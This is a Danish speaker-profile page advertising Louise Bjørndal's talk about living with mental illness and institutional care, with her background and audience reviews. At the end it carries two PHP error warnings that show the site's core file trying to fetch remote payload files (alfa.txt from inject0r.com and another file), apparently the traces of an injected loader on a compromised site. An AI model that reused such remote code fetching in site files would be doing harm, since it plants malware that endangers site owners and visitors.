img-us
  • asc

    Foredragsholder Louise Bjørndal

  • asc

    Emne Mit liv på tværs

  • asc

    pris 5000.-

Baggrund
Jeg hedder Louise Bjørndal er 31 år gammel og bor i Odsherred. Jeg arbejder til daglig som foredragsholder, formidler, forfatter og Peerguide.

Igennem en stor del af mit liv har jeg været tilknyttet psykiatrien. Jeg har 11 års institutionsophold inkl. tre års indlæggelse på psykiatrisk afdeling, med i bagagen. Mit kendskab til psykiatrien er derfor enorm, og psykisk sygdom er min følgesvend, ven og til tider også min fjende. Men på trods af alt lever jeg et ganske normalt liv i dag. I 2017 vandt jeg Gallo Prisen for mit arbejde med afstigmatisering af psykisk sygdom og den gode historie.

Jeg elsker mit liv og er indbegrebet af resiliens modstandskraft/mælkebøttebarn) og kæmper for den gode historie. Min historie er lang og tung, men med humor og refleksion forsøger jeg at tage publikum, læser og andre interesserede med ind i et sind på tværs.

Foredraget
Mine foredrag handler om hvordan man bryder med psykisk sygdom, omsorgssvigt og års insitutionsophold og netop gør det som ingen troede var muligt!

Hvad har hjulpet?
- Hvad har gjort en forskel?
- Den gode historie
- Indblik i et sårbart sind
- At nå sine mål på trods af alt
- Vilje og stædighed som drivkraft

Udtalelser
Betina Eskehøj har anmeldt Louise Bjørndal - Mit liv på tværs – 5 stjerner - 31. marts 2017.

Louise er en dygtig og humoristisk foredragsholder, hvis historie det er værd at høre!

Nicolas Magnussen Koppel har anmeldt Louise Bjørndal - Mit liv på tværs – 5 stjerne r- 30. marts 2017.

Synes de er spændende og får noget nyt, med hjem hver gang. Der er en blanding af alvor og humor og engang selv ironi.

René Winther anbefaler Louise Bjørndal - Mit liv på tværs - 16. august 2018.

Louise er en fantastisk foredragsholder, der er inspirende, nærværende og formår at levere en vedkommende og rørende fortælling med en god portion humør. Det kan i allerhøjeste grad anbefales. Tak!

Haderup Borgerforening - Ærligt, alvorligt og umoristisk foredrag.

Alt for mange gik glip af en spændende aften i selskab med foredragsholder, forfatter og blogger Louise Bjørndal.

Her til aften gæstede forfatter, foredragsholder og blogger Louise Bjørndal Haderup Kultur- og Idrætscenter. Louise leverede en meget ærlig og åbenhjertig fortælling om hendes liv med alt, hvad det har indeholdt af vold, omsorgssvigt, seksuel overgreb, flere års indlæggelse på psykiatrisk sygehus og institutioner og meget andet.

Et så alvorligt foredrag, kunne nemt blive tungt at fortælle og lytte til, men Louise fortalte det med en stor ærlighed blandet med en god portion humor og selvironi, så lytterne flere gange kunne tage sig selv i at sidde og grine, selvom indholdet til tider kunne være endog meget alvorligt og rørende.

Der var gode spørgsmål fra salen og flere fik Louises bog På tværs af hverdags tanker med hjem i tasken.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22